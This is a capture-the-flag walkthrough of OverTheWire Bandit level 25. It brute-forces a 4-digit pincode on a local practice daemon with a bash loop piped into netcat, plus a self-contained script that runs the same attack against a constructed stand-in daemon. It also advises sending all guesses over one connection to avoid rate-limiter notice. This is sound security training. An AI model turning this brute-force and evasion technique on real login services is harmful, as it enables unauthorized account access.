Bandit Level 25 Walkthrough

Level 24 ➔ Level 25: Mastering Automated Brute-Forcing

1. My Objective

I am currently logged in as bandit24. My goal is to retrieve the password for Level 25 from a daemon (a background service) listening on port 30002 of localhost. To get the password, I must provide two things: the current password for bandit24 and a secret 4-digit pincode (ranging from 0000 to 9999).

The Technical Problem: There are 10,000 possible pincodes (0000, 0001, 0002 ... 9999). Typing them in by hand would take days. I need a script that generates all 10,000 guesses and sends them to the daemon over one connection in a matter of seconds.

2. The Feynman Explanation: The Stubborn Padlock

How do I open a suitcase if I forgot the 4-digit code? I can't hack the lock; I have to try every single possibility.

The Keychain Analogy:

Imagine I have a giant keychain with 10,000 keys. I know that one of these keys opens the door.

I could pick up a key, try it, put it down, and pick up the next one. This is slow and exhausting. Instead, I build a Machine (a Bash Script).

The machine is programmed to take every key in order and shove it into the lock as fast as possible. It doesn't get tired and doesn't make mistakes. Brute-forcing is simply using the computer's speed to do the "dumb work" that a human is too slow to do. In this level, I am using a loop to "yell" all 10,000 codes at the server until it says "Yes!"

3. Practical Solution

I will write a script in my temporary directory that generates a list containing the bandit24 password and every pincode from 0000 to 9999. I will then send that entire list to the service at once.

# Step 1: I define my current password (stored in a variable so it never has to be retyped)
bandit24@bandit:~$ PASS="VAfSAn929SAb36906sV..."

# Step 2: I use a 'for' loop to generate all combinations
# {0000..9999} is bash brace expansion; because the endpoints are written with
# leading zeros, every value is zero-padded to four digits (0000, 0001, ... 9999).
bandit24@bandit:~$ for i in {0000..9999}; do echo "$PASS $i"; done > /tmp/pritom_brute.txt

# Step 3: I send the entire file to port 30002 over a single netcat connection
bandit24@bandit:~$ cat /tmp/pritom_brute.txt | nc localhost 30002 | grep -v "Wrong"

# grep -v "Wrong" hides every failed attempt; the server's banner and the
# success message are the only lines left. After a moment, the password appears:
The password for bandit25 is p796Ng6pE6vSAr4S019SAb36906sV...

# Caveat: some netcat builds close the connection as soon as stdin hits EOF,
# before the server has answered every line. If the output stops short with no
# success message, check your nc's man page for its EOF/quit-delay option
# (-q <seconds> on Debian/Ubuntu netcat builds) so the socket stays open until
# the server has replied.
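The pipeline above only runs against the real daemon on the Bandit host. As an added example (not code from the original post), the script below rebuilds the same attack so it runs offline: a generator that zero-pads the pincode with printf "%04d" (the same trick as the Pro Tip further down, for shells without {0000..9999}), a constructed stand-in for the port-30002 daemon with made-up bandit24/bandit25 passwords and a made-up pin, and the grep -v "Wrong" filter. The stand-in daemon, its banner text and all password values are assumptions for demonstration; swap fake_daemon for nc localhost 30002 to use it on the real level.

```bash
#!/usr/bin/env bash
# Added example, not the original post's code: generate every guess, push it
# through ONE stream (one connection), and keep only the non-"Wrong" replies.

# Emit "<password> <pin>" for every pin from START to END, zero-padded to 4 digits.
# printf '%04d' turns 7 into 0007, which is what the daemon expects.
gen_guesses() {
    pass=$1; start=${2:-0}; end=${3:-9999}
    i=$start
    while [ "$i" -le "$end" ]; do
        printf '%s %04d\n' "$pass" "$i"
        i=$((i + 1))
    done
}

# Constructed stand-in for the port-30002 daemon so the pipeline runs offline.
# These values are made up; the real bandit24/bandit25 passwords are not used.
FAKE_PASS='constructed-bandit24-password'
FAKE_PIN='4242'
FAKE_NEXT='constructed-bandit25-password'

fake_daemon() {
    echo "I am the pincode checker (constructed stand-in). Send '<password> <pin>' per line."
    while IFS=' ' read -r pass pin; do
        if [ "$pass" = "$FAKE_PASS" ] && [ "$pin" = "$FAKE_PIN" ]; then
            echo "Correct!"
            echo "The password of user bandit25 is $FAKE_NEXT"
            echo "Exiting."
            return 0   # the daemon hangs up here; any guesses still in flight are never read
        fi
        echo "Wrong! Please enter the correct current password and pincode. Try again."
    done
}

# The whole attack: one stream of guesses, one "connection", filter out the noise.
# On the real level this is:  gen_guesses "$PASS" | nc localhost 30002 | grep -v Wrong
brute_force() {
    gen_guesses "$1" | fake_daemon | grep -v 'Wrong'
}

# Pull just the leaked password out of the filtered output (empty if the attack failed).
recovered_password() {
    brute_force "$1" | sed -n 's/^The password of user bandit25 is //p'
}

# Demo run against the stand-in daemon.
brute_force "$FAKE_PASS"
```

The generator is deliberately a pipeline stage rather than a temporary file: the daemon stops reading after the correct pair, the pipe closes, and the generator dies on SIGPIPE, so no effort is spent producing guesses the server will never see. Note that brute_force still prints the daemon's banner, because grep -v "Wrong" only drops lines containing that word; recovered_password shows how to extract the one line you actually want.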

Why did I use grep -v "Wrong"?

When I send 10,000 lines to the server, it replies to every wrong guess with a line like "Wrong! Please enter the correct pincode." Up to 9,999 of those would flood my screen and bury the one correct answer. The -v flag in grep stands for invert-match: it tells grep "print every line EXCEPT the ones that contain 'Wrong'." What is left is the server's banner and the successful login message.

🚀 My Pro Tips: Efficient Brute-Forcing

✨ Speed Matters: Persistent Connections

The mission instructions say: "You do not need to create new connections each time." This is a huge hint. Opening a fresh TCP connection for each of the 10,000 guesses means 10,000 handshakes and 10,000 banner exchanges, which is slow and is exactly the pattern a rate limiter or fail2ban-style tool would notice. By piping a single text file into nc, all 10,000 guesses travel through one open socket, one line after another, and the server answers them as fast as it can read them.

⭐ Leading Zeros with printf

If I couldn't use the {0000..9999} shortcut (for example in a plain POSIX sh, which has no brace expansion), I would generate the numbers with seq 0 9999 and format each one with printf "%04d\n" "$i" inside the loop. The %04d ensures that the number 1 becomes 0001. The daemon compares the pincode as a four-character string, so a brute-force that sends "1" instead of "0001" will never match even when it reaches the right number.

🔍 Redirecting to a file

If the output is too large to read live, I redirect the results to a file (> output.txt) so I can search it later with grep or strings at my own pace, instead of losing the one useful line in a scrolling terminal.

4. Why this matters

I see brute-force attacks in the real world every day. This is exactly how bots try to log into your WordPress site or your SSH server by trying thousands of common passwords. As a security professional, knowing how easy it is to automate these attacks reminds me why we use rate limiting and account lockout (for example, slowing down or locking an account after a handful of failed attempts), and Multi-Factor Authentication (MFA) so that a guessed password alone is not enough.

Lock Cracked!

I've successfully automated a network attack. I'll save this password and move on to Level 25 ➔ Level 26, where I will encounter a restricted shell!

Tags: #Linux #Bandit #OverTheWire #BruteForce #BashScripting #Loops #Netcat #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips